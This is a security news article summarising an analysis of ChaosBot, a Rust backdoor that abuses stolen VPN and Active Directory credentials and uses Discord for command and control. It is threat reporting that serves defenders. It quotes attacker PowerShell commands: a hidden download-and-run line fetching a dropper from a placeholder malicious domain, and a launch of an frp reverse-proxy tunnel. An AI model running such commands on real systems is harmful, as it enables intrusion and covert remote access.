New Chaosbot Leveraging CiscoVPN and Active Directory Passwords to Execute Network Commands

ChaosBot surfaced in late September 2025 as a sophisticated Rust-based backdoor targeting enterprise networks. Initial investigations revealed that threat actors gained entry by exploiting compromised CiscoVPN credentials coupled with over-privileged Active Directory service accounts.

Once inside, ChaosBot was stealthily deployed via side-loading techniques using the legitimate Microsoft Edge component identity_helper.exe from the C:\Users\Public\Libraries directory.

The malware’s Rust implementation and reliance on Discord for its command and control (C2) operations underscore an innovative blend of modern development practices and misappropriated mainstream services.

eSentire analysts noted that the threat actor behind ChaosBot operated through a Discord profile named “chaos_00019,” suggesting a deliberate attempt to mask communications within popular social platforms.

Victim demographics indicate a focus on Vietnamese-speaking environments, although lateral movement experiments on differing targets have been observed.

The combination of VPN credential abuse and over-privileged AD accounts enabled seamless WMI-based remote execution, facilitating widespread deployment before detection.

Following initial compromise, ChaosBot conducts reconnaissance and establishes a fast reverse proxy (frp) tunnel to maintain persistent access.

The malware downloads frp and its configuration file (node.ini) into C:\Users\Public\Music, then launches the proxy via a PowerShell-executed shell command:-

powershell -Command "$OutputEncoding = [System.Text.Encoding]::UTF8; C:\Users\Public\Music\node.exe -c C:\Users\Public\Music\node.ini"

This sequence creates a hidden communication channel over port 7000 to a remote AWS host, bypassing perimeter defenses and supporting subsequent lateral movements.

Infection Mechanism

The core infection mechanism of ChaosBot leverages two primary vectors: credential-based access and malicious Windows shortcuts.

In the former, valid CiscoVPN credentials and an over-privileged AD account named “serviceaccount” are used to run WMI commands that drop and execute the ChaosBot payload (msedge_elf.dll) on remote hosts.

The shortcut vector involves phishing emails containing .lnk files that execute a PowerShell one-liner to fetch and launch ChaosBot while opening a decoy PDF themed after the State Bank of Vietnam to distract the user.

This PowerShell command resembles:

powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'hxxps://malicious-domain/dropper.exe' -OutFile $env:Temp\chaosbot.exe; Start-Process $env:Temp\chaosbot.exe"

Upon execution, ChaosBot validates its embedded Discord bot token with a GET request to https://discord.com/api/v10/users/@me, then creates a dedicated channel named after the victim’s hostname using a POST to https://discord.com/api/v10/guilds/<GUILD_ID>/channels.

Subsequent shell commands fetched from Discord messages are executed in new PowerShell processes prefixed with UTF-8 encoding directives to preserve output integrity.

Results, including stdout, stderr, screenshots, or file attachments, are returned to the threat actor’s Discord channel via multipart/form-data POST requests.

This dual-vector approach—credential exploitation and social engineering using malicious shortcuts—combined with the use of legitimate services for C2, makes ChaosBot particularly challenging to detect and remediate.

Asset masquerading through built-in Windows binaries and rigorous encoding practices further obscure its presence within targeted environments.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.